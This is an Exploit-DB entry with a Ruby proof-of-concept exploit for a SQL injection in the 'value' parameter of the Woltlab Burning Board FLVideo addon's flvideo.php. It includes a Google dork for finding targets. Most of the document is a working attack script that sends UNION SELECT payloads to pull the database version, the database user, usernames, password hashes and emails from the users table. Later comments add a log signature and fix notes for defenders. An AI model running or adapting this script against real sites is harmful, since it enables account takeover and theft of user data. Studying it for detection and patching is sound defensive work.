Woltlab Burning Board FLVideo Addon - 'video.php?value' SQL Injection

EDB-ID:

28126

CVE:





Platform:

PHP

Date:

2013-09-06


# Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
# Google Dork: inurl:flvideo.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Vendor Homepage: http://www.flvideo.de/
# Version: FLVideo Addon for WBB © 2007 by Danny König 
# Tested on: Windows8/Backtrack

#!/usr/bin/ruby
#secunet.cc
#19.02.2013
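#Vulnerability discovered by Easy Laster
#NOTE: the sample request below omits one line of the query string that
#the script itself sends (the concat() terminator and the first run of nulls).
#flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*
#*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))
#null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/
#**/+userid=1--+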
# Interactive proof-of-concept for the SQL injection in the `value` query
# parameter of flvideo.php (action=search, for=cat).
#
# Flow: print a banner, prompt for host, script path and a user id, then send
# six GET requests over plain HTTP (port 80). Each request appends a
# UNION ALL SELECT against the bb1_users table to `value` and asks for one
# item: version(), user(), userid, username, password, email. The requested
# value is wrapped in 0x7e/0x27 ('~' and "'") markers by concat() so it can be
# picked out of the response body with the regex /'~'(.+)'~'/.
#
# Defender notes:
#  - Log/WAF signature: requests to flvideo.php whose `value` parameter starts
#    with 999999.9 and contains `union`, `/**/` inline comments and
#    `concat(0x7e,0x27,`. Legitimate category searches should carry none of these.
#  - The root cause is on the server side: `value` evidently reaches a SQL
#    statement unescaped. The fix belongs in the addon (numeric validation or a
#    bound parameter for `value`); disable the addon where it cannot be patched.
#  - If such requests show up in access logs with a 200 response, treat the
#    password hashes and e-mail addresses in the users table as disclosed.
print "
################################################################
#                            secunet.cc                        #
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
#                          Exploit                             #
#                     Using Host+Path+id                       #
#              www.demo.de + /wbb/ + or + / + 1                #
#                         Easy Laster                          #
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
# Separator line printed between the prompts.
block = "################################################################"
print ""+ block +""
# The three answers below are concatenated into the request as typed; nothing
# is validated or URL-encoded by this script.
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
# Everything from here to `rescue` runs as one unit: the first request that
# errors (connection failure, or no marker in the response so that match()
# returns nil and [1] raises) aborts the remaining requests and prints
# "Exploit Failed". Output already printed by earlier requests stays on screen.
begin
# Request 1: database server version (version()).
dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
       "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+
       "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
       "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
       "**/+userid="+ userid +"--+"
       http = Net::HTTP.new(host, 80)
       resp= http.get(path+dir)
       print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]

          # Request 2: account the application uses to connect to the database (user()).
          dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
          "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+
          "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
          "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
          "**/+userid="+ userid +"--+"
          http = Net::HTTP.new(host, 80)
          resp= http.get(path+dir)
          print "\nDatabase User  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

             # Request 3: the userid column of the selected bb1_users row.
             dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
             "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+
             "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
             "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
             "**/+userid="+ userid +"--+"
             http = Net::HTTP.new(host, 80)
             resp= http.get(path+dir)
             print "\nID Account  -> "+(/'~'(.+)'~'/).match(resp.body)[1]

         # Request 4: the username column of the same row.
         dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
         "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+
         "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
         "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
         "**/+userid="+ userid +"--+"
         http = Net::HTTP.new(host, 80)
         resp= http.get(path+dir)
         print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]

      # Request 5: the password column. The output label calls it MD5, i.e. the
      # author expects a stored hash rather than a cleartext password
      # (NOTE(review): hash scheme is taken from the label only; confirm per install).
      dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
      "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+
      "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
      "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
      "**/+userid="+ userid +"--+"
      http = Net::HTTP.new(host, 80)
      resp= http.get(path+dir)
      print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]

   # Request 6: the email column of the same row.
   dir =  "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    print "\n"     
  print ""+ block +""
   print "\n"
 print "
################################################################
#                            Greetings                         #
################################################################
#mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
#DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
#ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc  #
################################################################
   "
   # Bare rescue: catches any StandardError raised above and reports a single
   # generic failure, without saying which request failed or why.
   rescue
  print "\nExploit Failed"
end